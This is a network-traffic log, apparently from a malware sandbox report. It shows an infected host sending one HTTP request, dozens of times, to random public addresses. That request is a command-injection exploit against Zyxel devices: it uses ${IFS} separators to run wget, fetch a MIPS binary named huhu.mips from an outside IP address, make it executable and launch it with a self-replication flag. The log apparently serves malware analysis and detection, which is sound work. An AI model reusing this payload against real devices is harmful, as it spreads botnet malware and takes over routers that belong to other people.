                                                        Feb 2, 2024 06:21:28.299978018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8917192.168.2.144491448.43.250.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300012112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8918192.168.2.1449132146.248.113.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300041914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8919192.168.2.1450716114.43.201.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300098896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8920192.168.2.144760897.35.52.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300136089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8921192.168.2.1445810155.11.132.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300182104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8922192.168.2.144477038.216.109.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300223112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8923192.168.2.143731493.123.209.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300255060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8924192.168.2.1434510134.48.120.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300307989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8925192.168.2.1460674211.47.251.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300333977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8926192.168.2.1443760150.101.14.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300367117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8927192.168.2.143876879.135.215.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300415039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8928192.168.2.144834247.205.254.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300457954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8929192.168.2.145008462.116.250.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300493002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8930192.168.2.145432647.226.7.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300523043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8931192.168.2.143570862.101.59.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300580978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8932192.168.2.1460902206.43.33.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300605059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8933192.168.2.14495704.235.80.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300656080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8934192.168.2.1433930157.40.126.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300707102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8935192.168.2.1451652146.53.101.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300757885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8936192.168.2.1442480168.30.188.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300770998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8937192.168.2.1445774219.15.49.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300843954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8938192.168.2.1435640149.242.7.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300867081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8939192.168.2.1435588104.5.52.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300893068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8940192.168.2.143717658.23.189.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300916910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8941192.168.2.145948219.90.50.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.300961018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8942192.168.2.145297079.221.209.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301006079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8943192.168.2.1441442186.14.196.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301033974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8944192.168.2.146064627.67.2.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301073074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8945192.168.2.143531413.244.208.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301106930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8946192.168.2.145643618.237.250.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301140070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8947192.168.2.144981897.26.168.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301177979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8948192.168.2.14575204.34.109.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301250935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8949192.168.2.143807887.51.208.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301276922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8950192.168.2.1437934202.88.52.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301320076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8951192.168.2.14398101.154.50.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301372051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8952192.168.2.1449440116.205.124.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301394939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8953192.168.2.1433860179.221.7.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301440001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8954192.168.2.1440928199.4.218.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301467896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8955192.168.2.14435361.87.48.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301497936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8956192.168.2.1439252128.33.207.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301529884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8957192.168.2.1437948175.20.58.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301573992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8958192.168.2.1457938211.181.178.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301624060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8959192.168.2.1460648149.246.118.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301656008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8960192.168.2.1442244130.239.159.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301723003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8961192.168.2.1444354108.253.88.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301733017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8962192.168.2.145792077.140.233.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301757097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8963192.168.2.1442960221.118.218.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301793098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8964192.168.2.144213859.226.128.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301815987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8965192.168.2.1453536218.102.18.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301866055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8966192.168.2.1438068112.94.102.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301913977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8967192.168.2.1433968194.169.190.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301965952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8968192.168.2.1457626159.91.7.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.301999092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8969192.168.2.1450392176.191.17.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302043915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8970192.168.2.145121819.196.247.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302069902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8971192.168.2.1459794122.123.17.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302125931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8972192.168.2.145589248.60.148.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302167892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8973192.168.2.1451994136.130.49.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302177906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8974192.168.2.145435287.87.221.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302226067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8975192.168.2.1455878109.179.20.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302248001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8976192.168.2.1448804174.244.75.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302304983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8977192.168.2.1456830164.116.130.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302326918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8978192.168.2.144334820.190.202.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.302378893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8979192.168.2.145327073.245.92.50443
                                                        TimestampBytes transferredDirectionData
